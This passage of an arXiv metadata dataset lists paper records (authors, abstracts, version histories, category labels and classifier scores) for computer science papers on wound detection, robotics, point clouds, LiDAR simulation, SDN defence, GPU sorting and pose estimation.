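        carrier = other                             # message jumps

print("estimated clockwise message speed:", travelled / T)
```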
|
[
{
"version": "v1",
"created": "Sat, 11 Aug 2018 16:28:42 GMT"
},
{
"version": "v2",
"created": "Wed, 4 Mar 2020 15:56:22 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Cheliotis",
"Dimitris",
""
],
[
"Kontoyiannis",
"Ioannis",
""
],
[
"Loulakis",
"Michail",
""
],
[
"Toumpis",
"Stavros",
""
]
] |
new_dataset
| 0.996885 |
2009.07133
|
D. M. Anisuzzaman
|
D. M. Anisuzzaman (1), Yash Patel (1), Jeffrey Niezgoda (2), Sandeep
Gopalakrishnan (3), and Zeyun Yu (1,4) ((1) Department of Computer Science,
University of Wisconsin-Milwaukee, Milwaukee, WI, USA,(2) Advancing the
Zenith of Healthcare (AZH) Wound and Vascular Center, Milwaukee, WI, USA, (3)
College of Nursing, University of Wisconsin Milwaukee, Milwaukee, WI, USA,(4)
Department of Biomedical Engineering, University of Wisconsin-Milwaukee,
Milwaukee, WI, USA.)
|
A Mobile App for Wound Localization using Deep Learning
|
8 pages, 5 figures, 1 table
|
IEEE Access. 30 May 2022
|
10.1109/ACCESS.2022.3179137
| null |
cs.CV
|
http://creativecommons.org/licenses/by-nc-sa/4.0/
|
We present an automated wound localizer for 2D wound and ulcer images based on
a deep neural network, as the first step towards building an automated and
complete wound diagnostic system. The wound localizer has been developed using
the YOLOv3 model, which is then turned into an iOS mobile application. The
developed localizer can detect the wound and its surrounding tissues and
isolate the localized wound region from images, which would be very helpful
for downstream processing such as wound segmentation and classification due to
the removal of unnecessary regions. For mobile app development with video
processing, a lighter version of YOLOv3 named tiny-YOLOv3 has been used. The
model is trained and tested on our own image dataset, collected in
collaboration with the AZH Wound and Vascular Center, Milwaukee, Wisconsin. The
YOLOv3 model is compared with the SSD model, showing that YOLOv3 achieves a mAP
of 93.9%, much better than the SSD model (86.4%). The robustness and
reliability of these models are also tested on a publicly available dataset
named Medetec, where they show very good performance as well.
|
[
{
"version": "v1",
"created": "Tue, 15 Sep 2020 14:35:29 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Anisuzzaman",
"D. M.",
""
],
[
"Patel",
"Yash",
""
],
[
"Niezgoda",
"Jeffrey",
""
],
[
"Gopalakrishnan",
"Sandeep",
""
],
[
"Yu",
"Zeyun",
""
]
] |
new_dataset
| 0.993453 |
2011.03085
|
Rinu Boney
|
Rinu Boney, Jussi Sainio, Mikko Kaivola, Arno Solin, Juho Kannala
|
RealAnt: An Open-Source Low-Cost Quadruped for Education and Research in
Real-World Reinforcement Learning
| null | null | null | null |
cs.RO cs.AI
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Current robot platforms available for research are either very expensive or
unable to handle the abuse of exploratory controls in reinforcement learning.
We develop RealAnt, a minimal low-cost physical version of the popular `Ant'
benchmark used in reinforcement learning. RealAnt costs only $\sim$350 EUR
(\$410) in materials and can be assembled in less than an hour. We validate the
platform with reinforcement learning experiments and provide baseline results
on a set of benchmark tasks. We demonstrate that the RealAnt robot can learn to
walk from scratch from less than 10 minutes of experience. We also provide
simulator versions of the robot (with the same dimensions, state-action spaces,
and delayed noisy observations) in the MuJoCo and PyBullet simulators. We
open-source hardware designs, supporting software, and baseline results for
educational use and reproducible research.
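As a hedged illustration of how such a platform is typically driven, here is a
standard Gym-style interaction loop; the environment id is hypothetical, and
the repository should be consulted for the actual registration names (the
classic pre-0.26 Gym API is assumed).

import gym

env = gym.make("RealAntMujoco-v0")          # hypothetical environment id
obs = env.reset()
total_reward = 0.0
for _ in range(1000):
    action = env.action_space.sample()      # a trained policy would act here
    obs, reward, done, info = env.step(action)
    total_reward += reward
    if done:
        obs = env.reset()
print(total_reward)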
|
[
{
"version": "v1",
"created": "Thu, 5 Nov 2020 20:26:22 GMT"
},
{
"version": "v2",
"created": "Sat, 4 Jun 2022 07:59:42 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Boney",
"Rinu",
""
],
[
"Sainio",
"Jussi",
""
],
[
"Kaivola",
"Mikko",
""
],
[
"Solin",
"Arno",
""
],
[
"Kannala",
"Juho",
""
]
] |
new_dataset
| 0.999272 |
2105.14508
|
Luca Giuzzi DPhil
|
Angela Aguglia, Michela Ceria, Luca Giuzzi
|
Some hypersurfaces over finite fields, minimal codes and secret sharing
schemes
|
20 pages; fully revised version
|
Designs, Codes and Cryptography (2022) 90:1503-1519
|
10.1007/s10623-022-01051-1
| null |
cs.IT math.CO math.IT
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Linear error-correcting codes can be used for constructing secret sharing
schemes; however, finding the access structures of these secret sharing
schemes in general and, in particular, determining efficient access structures
is difficult. Here we investigate the properties of certain algebraic
hypersurfaces over finite fields, whose intersection numbers with any
hyperplane take only a few values; these varieties give rise to $q$-divisible
linear codes with at most $5$ weights. Furthermore, for $q$ odd these codes
turn out to be minimal and we characterize the access structures of the secret
sharing schemes based on their dual codes. Indeed, the secret sharing schemes
thus obtained are democratic, that is each participant belongs to the same
number of minimal access sets and can easily be described.
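As background, a standard sufficient condition for minimality (due to
Ashikhmin and Barg; stated here for context, not necessarily the argument used
in this paper) requires the nonzero weights of a $q$-ary linear code to be
tightly clustered:
\[
  \frac{w_{\min}}{w_{\max}} > \frac{q-1}{q},
\]
where $w_{\min}$ and $w_{\max}$ denote the minimum and maximum nonzero Hamming
weights; codes with few weights, such as those constructed here, are natural
candidates for satisfying it.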
|
[
{
"version": "v1",
"created": "Sun, 30 May 2021 11:35:46 GMT"
},
{
"version": "v2",
"created": "Thu, 3 Jun 2021 15:57:42 GMT"
},
{
"version": "v3",
"created": "Thu, 26 Aug 2021 09:14:34 GMT"
},
{
"version": "v4",
"created": "Tue, 11 Jan 2022 21:03:08 GMT"
},
{
"version": "v5",
"created": "Sun, 5 Jun 2022 13:59:11 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Aguglia",
"Angela",
""
],
[
"Ceria",
"Michela",
""
],
[
"Giuzzi",
"Luca",
""
]
] |
new_dataset
| 0.990747 |
2109.01817
|
Kamal Singh
|
Kamal Singh, Chandradeep Singh, and Kuang-Hao Liu
|
Low SNR Capacity of Keyhole MIMO Channel in Nakagami-m Fading With Full
CSI
| null | null | null | null |
cs.IT eess.SP math.IT
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
In this paper, we obtain asymptotic expressions for the ergodic capacity of
the keyhole multiple-input multiple-output (MIMO) channel at low
signal-to-noise ratio (SNR) in independent and identically distributed
Nakagami-$m$ fading conditions with perfect channel state information at the
transmitter and receiver. We show that the low-SNR capacity of this keyhole
MIMO channel scales proportionally as $\frac{\textrm{SNR}}{4} \log^2
\left(1/{\textrm{SNR}}\right)$. Our main contribution is to identify a
surprising result that the low-SNR capacity of the MIMO fading channel
increases in the presence of keyhole degenerate condition, which is in direct
contrast to the well-known MIMO capacity degradation at high SNR under keyhole
conditions. To explain why the rank-deficient keyhole fading channel
outperforms the full-rank MIMO fading channel at sufficiently low SNR, we
remark that the rank of the MIMO channel matrix has no impact in the low-SNR
regime and that the double-faded (or double-scattering) nature of the keyhole
MIMO channel creates more opportunistic communication at low SNR when compared
with the pure MIMO fading channel, which leads to increased capacity. Finally, we also show
that a simple one-bit channel information based on-off power control achieves
this low-SNR capacity; surprisingly, this power adaptation is robust against
both moderate and severe fading for a wide range of low SNR values. These
results also hold for the keyhole MIMO Rayleigh channel as a special case.
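In display form, the scaling law stated above reads
\[
  C(\mathrm{SNR}) \sim \frac{\mathrm{SNR}}{4}\,\log^{2}\!\left(\frac{1}{\mathrm{SNR}}\right)
  \quad \text{as } \mathrm{SNR}\to 0,
\]
which grows faster than the linear low-SNR capacity of a non-fading AWGN
channel, $C \approx \mathrm{SNR}\log_{2}e$, consistent with the opportunistic
gain described above.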
|
[
{
"version": "v1",
"created": "Sat, 4 Sep 2021 08:33:52 GMT"
},
{
"version": "v2",
"created": "Tue, 7 Sep 2021 02:04:47 GMT"
},
{
"version": "v3",
"created": "Fri, 24 Dec 2021 05:47:14 GMT"
},
{
"version": "v4",
"created": "Fri, 31 Dec 2021 05:17:10 GMT"
},
{
"version": "v5",
"created": "Mon, 30 May 2022 16:37:10 GMT"
},
{
"version": "v6",
"created": "Sun, 5 Jun 2022 12:05:52 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Singh",
"Kamal",
""
],
[
"Singh",
"Chandradeep",
""
],
[
"Liu",
"Kuang-Hao",
""
]
] |
new_dataset
| 0.992814 |
2111.02006
|
Karn N Watcharasupat
|
Kenneth Ooi, Karn N. Watcharasupat, Santi Peksi, Furi Andi Karnapi,
Zhen-Ting Ong, Danny Chua, Hui-Wen Leow, Li-Long Kwok, Xin-Lei Ng, Zhen-Ann
Loh, and Woon-Seng Gan
|
A Strongly-Labelled Polyphonic Dataset of Urban Sounds with
Spatiotemporal Context
|
7 pages, 8 figures, 3 tables. To be published in Proceedings of the
13th Asia Pacific Signal and Information Processing Association Annual Summit
and Conference, 2021
|
Proceedings of the 2021 Asia-Pacific Signal and Information
Processing Association Annual Summit and Conference (APSIPA ASC), 2021, pp.
982-988
| null | null |
cs.SD eess.AS
|
http://creativecommons.org/licenses/by-sa/4.0/
|
This paper introduces SINGA:PURA, a strongly labelled polyphonic urban sound
dataset with spatiotemporal context. The data were collected via several
recording units deployed across Singapore as a part of a wireless acoustic
sensor network. These recordings were made as part of a project to identify and
mitigate noise sources in Singapore, but also possess a wider applicability to
sound event detection, classification, and localization. This paper introduces
an accompanying hierarchical label taxonomy, which has been designed to be
compatible with other existing datasets for urban sound tagging while also able
to capture sound events unique to the Singaporean context. This paper details
the data collection, annotation, and processing methodologies for the creation
of the dataset. We further perform exploratory data analysis and include the
performance of a baseline model on the dataset as a benchmark.
|
[
{
"version": "v1",
"created": "Wed, 3 Nov 2021 03:52:34 GMT"
},
{
"version": "v2",
"created": "Thu, 11 Nov 2021 14:43:30 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Ooi",
"Kenneth",
""
],
[
"Watcharasupat",
"Karn N.",
""
],
[
"Peksi",
"Santi",
""
],
[
"Karnapi",
"Furi Andi",
""
],
[
"Ong",
"Zhen-Ting",
""
],
[
"Chua",
"Danny",
""
],
[
"Leow",
"Hui-Wen",
""
],
[
"Kwok",
"Li-Long",
""
],
[
"Ng",
"Xin-Lei",
""
],
[
"Loh",
"Zhen-Ann",
""
],
[
"Gan",
"Woon-Seng",
""
]
] |
new_dataset
| 0.999701 |
2111.14819
|
Xumin Yu
|
Xumin Yu, Lulu Tang, Yongming Rao, Tiejun Huang, Jie Zhou, Jiwen Lu
|
Point-BERT: Pre-training 3D Point Cloud Transformers with Masked Point
Modeling
|
Accepted to CVPR 2022, Project page:
https://point-bert.ivg-research.xyz
| null | null | null |
cs.CV cs.AI cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We present Point-BERT, a new paradigm for learning Transformers that
generalizes the concept of BERT to 3D point clouds. Inspired by BERT, we devise a Masked
Point Modeling (MPM) task to pre-train point cloud Transformers. Specifically,
we first divide a point cloud into several local point patches, and a point
cloud Tokenizer with a discrete Variational AutoEncoder (dVAE) is designed to
generate discrete point tokens containing meaningful local information. Then,
we randomly mask out some patches of input point clouds and feed them into the
backbone Transformers. The pre-training objective is to recover the original
point tokens at the masked locations under the supervision of point tokens
obtained by the Tokenizer. Extensive experiments demonstrate that the proposed
BERT-style pre-training strategy significantly improves the performance of
standard point cloud Transformers. Equipped with our pre-training strategy, we
show that a pure Transformer architecture attains 93.8% accuracy on ModelNet40
and 83.1% accuracy on the hardest setting of ScanObjectNN, surpassing carefully
designed point cloud models with much fewer hand-made designs. We also
demonstrate that the representations learned by Point-BERT transfer well to new
tasks and domains, where our models largely advance the state-of-the-art of
few-shot point cloud classification task. The code and pre-trained models are
available at https://github.com/lulutang0608/Point-BERT
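The following self-contained toy (ours) illustrates the Masked Point Modeling
objective; the patch embedder and the frozen dVAE tokenizer are replaced by
tiny random stand-ins, so this is a shape-level sketch rather than the released
implementation (a recent PyTorch with batch_first Transformer layers is
assumed).

import torch
import torch.nn as nn
import torch.nn.functional as F

B, P, D, V = 2, 64, 32, 512                  # batch, patches, feature dim, token vocab
patch_feats = torch.randn(B, P, D)           # stand-in for embedded local point patches
tokenizer = nn.Linear(D, V)                  # stand-in for the frozen dVAE tokenizer
layer = nn.TransformerEncoderLayer(D, nhead=4, batch_first=True)
backbone = nn.TransformerEncoder(layer, num_layers=2)
head = nn.Linear(D, V)

with torch.no_grad():
    targets = tokenizer(patch_feats).argmax(-1)      # discrete point tokens
mask = torch.rand(B, P) < 0.4                        # mask ~40% of the patches
x = patch_feats.clone()
x[mask] = 0.0                                        # blank out masked patches
logits = head(backbone(x))
loss = F.cross_entropy(logits[mask], targets[mask])  # recover tokens at masked slots
print(float(loss))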
|
[
{
"version": "v1",
"created": "Mon, 29 Nov 2021 18:59:03 GMT"
},
{
"version": "v2",
"created": "Mon, 6 Jun 2022 07:26:41 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Yu",
"Xumin",
""
],
[
"Tang",
"Lulu",
""
],
[
"Rao",
"Yongming",
""
],
[
"Huang",
"Tiejun",
""
],
[
"Zhou",
"Jie",
""
],
[
"Lu",
"Jiwen",
""
]
] |
new_dataset
| 0.996997 |
2203.15118
|
Martin Hahner
|
Martin Hahner, Christos Sakaridis, Mario Bijelic, Felix Heide, Fisher
Yu, Dengxin Dai, Luc Van Gool
|
LiDAR Snowfall Simulation for Robust 3D Object Detection
|
Oral at CVPR 2022
| null | null | null |
cs.CV cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
3D object detection is a central task for applications such as autonomous
driving, in which the system needs to localize and classify surrounding traffic
agents, even in the presence of adverse weather. In this paper, we address the
problem of LiDAR-based 3D object detection under snowfall. Due to the
difficulty of collecting and annotating training data in this setting, we
propose a physically based method to simulate the effect of snowfall on real
clear-weather LiDAR point clouds. Our method samples snow particles in 2D space
for each LiDAR line and uses the induced geometry to modify the measurement for
each LiDAR beam accordingly. Moreover, as snowfall often causes wetness on the
ground, we also simulate ground wetness on LiDAR point clouds. We use our
simulation to generate partially synthetic snowy LiDAR data and leverage these
data for training 3D object detection models that are robust to snowfall. We
conduct an extensive evaluation using several state-of-the-art 3D object
detection methods and show that our simulation consistently yields significant
performance gains on the real snowy STF dataset compared to clear-weather
baselines and competing simulation approaches, while not sacrificing
performance in clear weather. Our code is available at
www.github.com/SysCV/LiDAR_snow_sim.
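The core geometric idea can be caricatured in one dimension (our toy, much
simpler than the paper's per-beam 2D particle sampling): if a sampled snow
particle blocks the beam before its clear-weather return, the measured range
shrinks accordingly.

import random

def snowy_range(clear_range, hit_prob=0.01, bin_size=0.5, seed=0):
    rng = random.Random(seed)
    r = bin_size
    while r < clear_range:
        if rng.random() < hit_prob:   # a sampled particle occludes the beam here
            return r                  # early, snow-induced return
        r += bin_size
    return clear_range                # beam reaches the original surface

print([round(snowy_range(30.0, seed=s), 1) for s in range(5)])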
|
[
{
"version": "v1",
"created": "Mon, 28 Mar 2022 21:48:26 GMT"
},
{
"version": "v2",
"created": "Sun, 5 Jun 2022 12:17:44 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Hahner",
"Martin",
""
],
[
"Sakaridis",
"Christos",
""
],
[
"Bijelic",
"Mario",
""
],
[
"Heide",
"Felix",
""
],
[
"Yu",
"Fisher",
""
],
[
"Dai",
"Dengxin",
""
],
[
"Van Gool",
"Luc",
""
]
] |
new_dataset
| 0.999458 |
2204.09914
|
Xiaoyan Li
|
Xiaoyan Li, Gang Zhang, Hongyu Pan, Zhenhua Wang
|
CPGNet: Cascade Point-Grid Fusion Network for Real-Time LiDAR Semantic
Segmentation
|
Accepted in the 2022 IEEE International Conference on Robotics and
Automation (ICRA 2022)
| null | null | null |
cs.CV
|
http://creativecommons.org/licenses/by/4.0/
|
LiDAR semantic segmentation, which is essential for advanced autonomous
driving, is required to be accurate, fast, and easy to deploy on mobile
platforms. Previous point-based or sparse voxel-based methods are far from
real-time applications since they employ time-consuming neighbor searching or
sparse 3D convolution. Recent 2D projection-based methods, including range view and
multi-view fusion, can run in real time, but suffer from lower accuracy due to
information loss during the 2D projection. Besides, to improve the performance,
previous methods usually adopt test time augmentation (TTA), which further
slows down the inference process. To achieve a better speed-accuracy trade-off,
we propose Cascade Point-Grid Fusion Network (CPGNet), which ensures both
effectiveness and efficiency mainly by the following two techniques: 1) the
novel Point-Grid (PG) fusion block extracts semantic features mainly on the 2D
projected grid for efficiency, while summarizes both 2D and 3D features on 3D
point for minimal information loss; 2) the proposed transformation consistency
loss narrows the gap between the single-time model inference and TTA. The
experiments on the SemanticKITTI and nuScenes benchmarks demonstrate that the
CPGNet without ensemble models or TTA is comparable with the state-of-the-art
RPVNet, while it runs 4.7 times faster.
|
[
{
"version": "v1",
"created": "Thu, 21 Apr 2022 06:56:30 GMT"
},
{
"version": "v2",
"created": "Wed, 27 Apr 2022 03:25:52 GMT"
},
{
"version": "v3",
"created": "Mon, 6 Jun 2022 07:45:59 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Li",
"Xiaoyan",
""
],
[
"Zhang",
"Gang",
""
],
[
"Pan",
"Hongyu",
""
],
[
"Wang",
"Zhenhua",
""
]
] |
new_dataset
| 0.98929 |
2205.12816
|
Ritvik Muttreja
|
Ananya Saxena, Ritvik Muttreja, Shivam Upadhyay, K. Shiv Kumar,
Venkanna U
|
P4Filter: A two level defensive mechanism against attacks in SDN using
P4
| null | null | null | null |
cs.NI
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
The advancements in networking technologies have led to a new paradigm of
controlling networks, with data plane programmability as a basis. This facility
opens up many advantages, such as flexibility in packet processing and better
network management, which leads to better security in the network. However, the
current literature lacks network security solutions concerning authentication
and the prevention of unauthorized access. In this work, our goal is to
prevent attacks with a two-level defense mechanism (P4Filter). The first level
is dynamic firewall logic, which blocks packets generated from an unauthorized
source. The second level is an authentication mechanism based on dynamic port
knocking. The two security levels were tested in a virtual environment with
P4-based switches. Packets arriving at the switch from unknown hosts are sent
to the controller. The controller maintains an ACL, using which it assigns
rules for both levels to allow or drop packets. For port knocking, a new
random sequence is generated for every new host. Hosts can only connect using
the correct sequence assigned to them. The tests conducted show that this
approach performs better than previous P4-based firewall approaches due to its
two security levels. Moreover, it is successful in mitigating specific security
attacks by blocking unauthorized access to the network.
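A plain-Python sketch of the dynamic port-knocking idea follows (ours, for
illustration only; in P4Filter the corresponding rules are installed on P4
switches by the controller): each new host receives a fresh random knock
sequence and must replay it in order before being admitted.

import random

class KnockTracker:
    def __init__(self, port_range=(1024, 65535), length=3, seed=None):
        self.rng = random.Random(seed)
        self.port_range, self.length = port_range, length
        self.expected, self.progress = {}, {}

    def register(self, host):
        seq = [self.rng.randrange(*self.port_range) for _ in range(self.length)]
        self.expected[host], self.progress[host] = seq, 0
        return seq                            # communicated to the host out of band

    def knock(self, host, port):
        seq = self.expected.get(host)
        if seq is None:
            return False                      # unknown host: drop
        i = self.progress[host]
        self.progress[host] = i + 1 if port == seq[i] else 0
        if self.progress[host] == self.length:
            self.progress[host] = 0           # reset for the next session
            return True                       # admit the host
        return False

tracker = KnockTracker(seed=1)
seq = tracker.register("10.0.0.5")
print([tracker.knock("10.0.0.5", p) for p in seq])   # [False, False, True]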
|
[
{
"version": "v1",
"created": "Wed, 25 May 2022 14:43:51 GMT"
},
{
"version": "v2",
"created": "Mon, 6 Jun 2022 05:42:12 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Saxena",
"Ananya",
""
],
[
"Muttreja",
"Ritvik",
""
],
[
"Upadhyay",
"Shivam",
""
],
[
"Kumar",
"K. Shiv",
""
],
[
"U",
"Venkanna",
""
]
] |
new_dataset
| 0.958153 |
2205.13600
|
Vittorio Caggiano
|
Vittorio Caggiano, Huawei Wang, Guillaume Durandau, Massimo Sartori
and Vikash Kumar
|
MyoSuite -- A contact-rich simulation suite for musculoskeletal motor
control
| null | null | null |
PMLR 168:492-507, 2022
|
cs.RO cs.AI cs.LG
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
Embodied agents in continuous control domains have had limited exposure to
tasks that allow exploring the musculoskeletal properties enabling agile and
nimble behaviors in biological beings. The sophistication behind
neuro-musculoskeletal control can pose new challenges for the motor learning
community. At the same time, agents solving complex neural control problems
can have impact in fields such as neuro-rehabilitation, as well as
collaborative robotics. Human biomechanics underlies complex multi-joint,
multi-actuator musculoskeletal systems. The sensory-motor system relies on a
range of contact-rich sensory and proprioceptive inputs that define and
condition the muscle actuation required to exhibit intelligent behaviors in
the physical world. Current frameworks for musculoskeletal control do not
support the physiological sophistication of musculoskeletal systems together
with physical-world interaction capabilities. In addition, they are neither
embedded in complex and skillful motor tasks nor computationally effective and
scalable enough to study large-scale learning paradigms. Here, we present MyoSuite -- a suite
of physiologically accurate biomechanical models of elbow, wrist, and hand,
with physical contact capabilities, which allow learning of complex and
skillful contact-rich real-world tasks. We provide diverse motor-control
challenges: from simple postural control to skilled hand-object interactions
such as turning a key, twirling a pen, rotating two balls in one hand, etc. By
supporting physiological alterations in musculoskeletal geometry (tendon
transfer), assistive devices (exoskeleton assistance), and muscle contraction
dynamics (muscle fatigue, sarcopenia), we present real-life tasks with temporal
changes, thereby exposing realistic non-stationary conditions in our tasks
which most continuous control benchmarks lack.
|
[
{
"version": "v1",
"created": "Thu, 26 May 2022 20:11:23 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Caggiano",
"Vittorio",
""
],
[
"Wang",
"Huawei",
""
],
[
"Durandau",
"Guillaume",
""
],
[
"Sartori",
"Massimo",
""
],
[
"Kumar",
"Vikash",
""
]
] |
new_dataset
| 0.993928 |
2205.15659
|
Petar Veli\v{c}kovi\'c
|
Petar Veli\v{c}kovi\'c, Adri\`a Puigdom\`enech Badia, David Budden,
Razvan Pascanu, Andrea Banino, Misha Dashevskiy, Raia Hadsell, Charles
Blundell
|
The CLRS Algorithmic Reasoning Benchmark
|
To appear in ICML 2022. 19 pages, 4 figures
| null | null | null |
cs.LG cs.DS stat.ML
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Learning representations of algorithms is an emerging area of machine
learning, seeking to bridge concepts from neural networks with classical
algorithms. Several important works have investigated whether neural networks
can effectively reason like algorithms, typically by learning to execute them.
The common trend in the area, however, is to generate targeted kinds of
algorithmic data to evaluate specific hypotheses, making results hard to
transfer across publications, and increasing the barrier of entry. To
consolidate progress and work towards unified evaluation, we propose the CLRS
Algorithmic Reasoning Benchmark, covering classical algorithms from the
Introduction to Algorithms textbook. Our benchmark spans a variety of
algorithmic reasoning procedures, including sorting, searching, dynamic
programming, graph algorithms, string algorithms and geometric algorithms. We
perform extensive experiments to demonstrate how several popular algorithmic
reasoning baselines perform on these tasks, and consequently, highlight links
to several open challenges. Our library is readily available at
https://github.com/deepmind/clrs.
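To illustrate what "learning to execute" supervision looks like, here is a
small sketch of ours (not the CLRS API): benchmarks of this kind expose not
just input/output pairs but full algorithm trajectories, i.e., intermediate
states ("hints") recorded at every step.

def insertion_sort_with_hints(a):
    a, hints = list(a), [list(a)]
    for i in range(1, len(a)):
        j = i
        while j > 0 and a[j - 1] > a[j]:
            a[j - 1], a[j] = a[j], a[j - 1]
            j -= 1
        hints.append(list(a))                # one intermediate state per outer step
    return a, hints

out, hints = insertion_sort_with_hints([3, 1, 2])
print(out)     # [1, 2, 3]
print(hints)   # [[3, 1, 2], [1, 3, 2], [1, 2, 3]]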
|
[
{
"version": "v1",
"created": "Tue, 31 May 2022 09:56:44 GMT"
},
{
"version": "v2",
"created": "Sat, 4 Jun 2022 14:42:42 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Veličković",
"Petar",
""
],
[
"Badia",
"Adrià Puigdomènech",
""
],
[
"Budden",
"David",
""
],
[
"Pascanu",
"Razvan",
""
],
[
"Banino",
"Andrea",
""
],
[
"Dashevskiy",
"Misha",
""
],
[
"Hadsell",
"Raia",
""
],
[
"Blundell",
"Charles",
""
]
] |
new_dataset
| 0.986069 |
2206.01777
|
Jie Cai
|
Jie Cai, Zibo Meng, Jiaming Ding, and Chiu Man Ho
|
Real-Time Super-Resolution for Real-World Images on Mobile Devices
|
arXiv admin note: text overlap with arXiv:2004.13674
| null | null | null |
cs.CV eess.IV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Image Super-Resolution (ISR) aims at recovering High-Resolution (HR) images
from their corresponding Low-Resolution (LR) counterparts. Although recent
progress in ISR has been remarkable, most recent approaches are deep
learning-based and far too computationally intensive to be deployed on edge
devices. Moreover, these methods often fail in real-world scenes, since most
of them adopt a simple, fixed "ideal" bicubic downsampling kernel applied to
high-quality images to construct LR/HR training pairs, which may lose
frequency-related details. In this work, an approach for real-time ISR on
mobile devices is presented, which is able to deal with a wide range of
degradations in real-world scenarios. Extensive experiments on traditional
super-resolution datasets (Set5, Set14, BSD100, Urban100, Manga109, DIV2K) and
on real-world images with a variety of degradations demonstrate that our
method outperforms state-of-the-art methods, resulting in higher PSNR and
SSIM, lower noise, and better visual quality. Most importantly, our method
achieves real-time performance on mobile or edge devices.
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 18:44:53 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Cai",
"Jie",
""
],
[
"Meng",
"Zibo",
""
],
[
"Ding",
"Jiaming",
""
],
[
"Ho",
"Chiu Man",
""
]
] |
new_dataset
| 0.983031 |
2206.01784
|
Andrey Adinets
|
Andy Adinets and Duane Merrill
|
Onesweep: A Faster Least Significant Digit Radix Sort for GPUs
|
12 pages, 11 figures, 2 tables
| null | null | null |
cs.DC cs.DS
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
We present Onesweep, a least-significant digit (LSD) radix sorting algorithm
for large GPU sorting problems residing in global memory. Our parallel
algorithm employs a method of single-pass prefix sum that only requires ~2n
global read/write operations for each digit-binning iteration. This exhibits a
significant reduction in last-level memory traffic versus contemporary GPU
radix sorting implementations, where each iteration of digit binning requires
two passes through the dataset totaling ~3n global memory operations.
On the NVIDIA A100 GPU, our approach achieves 29.4 GKey/s when sorting 256M
random 32-bit keys. Compared to CUB, the current state-of-the-art GPU LSD radix
sort, our approach provides a speedup of ~1.5x. For 32-bit keys with varied
distributions, our approach provides more consistent performance compared to
HRS, the current state-of-the-art GPU MSD radix sort, and outperforms it in
almost all cases.
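For readers unfamiliar with LSD radix sort, the following plain CPU sketch
(ours) shows the digit-binning loop that the paper accelerates; on a GPU, the
histogram and scatter passes below are what make classic implementations touch
the data roughly three times per digit, and Onesweep's single-pass chained
prefix sum is what removes one of those passes.

def lsd_radix_sort(keys, bits=32):
    radix = 256
    for shift in range(0, bits, 8):
        counts = [0] * radix
        for k in keys:                       # pass 1: per-digit histogram
            counts[(k >> shift) & (radix - 1)] += 1
        offsets, total = [0] * radix, 0
        for d in range(radix):               # exclusive prefix sum of the histogram
            offsets[d], total = total, total + counts[d]
        out = [0] * len(keys)
        for k in keys:                       # pass 2: stable scatter by digit
            d = (k >> shift) & (radix - 1)
            out[offsets[d]] = k
            offsets[d] += 1
        keys = out
    return keys

print(lsd_radix_sort([170, 45, 75, 90, 802, 24, 2, 66]))   # [2, 24, 45, 66, 75, 90, 170, 802]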
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 19:08:55 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Adinets",
"Andy",
""
],
[
"Merrill",
"Duane",
""
]
] |
new_dataset
| 0.998599 |
2206.01867
|
Zihan Wang
|
Zihan Wang, Ruimin Chen, Mengxuan Liu, Guanfang Dong and Anup Basu
|
SPGNet: Spatial Projection Guided 3D Human Pose Estimation in Low
Dimensional Space
| null | null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We propose SPGNet, a method for 3D human pose estimation that mixes
multi-dimensional re-projection into supervised learning. In this method, the
2D-to-3D-lifting network predicts the global position and coordinates of the 3D
human pose. Then, we re-project the estimated 3D pose back to the 2D key points
along with spatial adjustments. The loss functions compare the estimated 3D
pose with the 3D pose ground truth, and re-projected 2D pose with the input 2D
pose. In addition, we propose a kinematic constraint to restrict the predicted
target with constant human bone length. Based on the estimation results for the
dataset Human3.6M, our approach outperforms many state-of-the-art methods both
qualitatively and quantitatively.
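A hedged NumPy sketch of the re-projection term follows (ours; the intrinsics
and joint values are made up, and the actual loss also includes the 3D term
and spatial adjustments described above): estimated 3D joints are projected
back through a pinhole camera and compared with the input 2D pose.

import numpy as np

def reproject(joints3d, f=1000.0, cx=500.0, cy=500.0):
    x, y, z = joints3d[:, 0], joints3d[:, 1], joints3d[:, 2]
    return np.stack([f * x / z + cx, f * y / z + cy], axis=1)

pred3d = np.array([[0.1, 0.2, 4.0], [-0.3, 0.1, 4.2]])   # toy predicted 3D joints
input2d = np.array([[525.0, 550.0], [430.0, 525.0]])     # toy input 2D key points
loss_2d = np.mean(np.sum((reproject(pred3d) - input2d) ** 2, axis=1))
print(loss_2d)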
|
[
{
"version": "v1",
"created": "Sat, 4 Jun 2022 00:51:00 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Wang",
"Zihan",
""
],
[
"Chen",
"Ruimin",
""
],
[
"Liu",
"Mengxuan",
""
],
[
"Dong",
"Guanfang",
""
],
[
"Basu",
"Anup",
""
]
] |
new_dataset
| 0.997544 |
2206.01908
|
Danyang Tu
|
Danyang Tu and Wei Sun and Xiongkuo Min and Guangtao Zhai and Wei Shen
|
Video-based Human-Object Interaction Detection from Tubelet Tokens
| null | null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We present a novel vision Transformer, named TUTOR, which is able to learn
